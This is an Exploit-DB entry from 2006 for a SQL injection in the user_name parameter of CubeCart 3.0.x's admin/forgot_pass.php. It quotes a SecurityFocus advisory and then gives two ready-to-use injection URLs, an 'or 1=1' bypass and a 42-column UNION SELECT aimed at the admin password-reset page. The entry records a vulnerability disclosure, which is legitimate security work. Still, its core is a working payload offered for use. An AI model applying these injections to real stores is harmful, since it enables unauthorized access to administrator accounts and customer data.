CubeCart 3.0.x admin/forgot_pass.php user_name Parameter SQL Injection

2006-09-26T00:00:00
ID EDB-ID:28695
Type exploitdb
Reporter HACKERS PAL
Modified 2006-09-26T00:00:00

Description

CubeCart 3.0.x admin/forgot_pass.php user_name Parameter SQL Injection. CVE-29242. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/20215/info

CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. 

A successful exploit of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or even exploit vulnerabilities in the underlying database implementation. Other attacks are also possible.

http://www.example.com/admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/*
http://www.example.com/admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,
23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*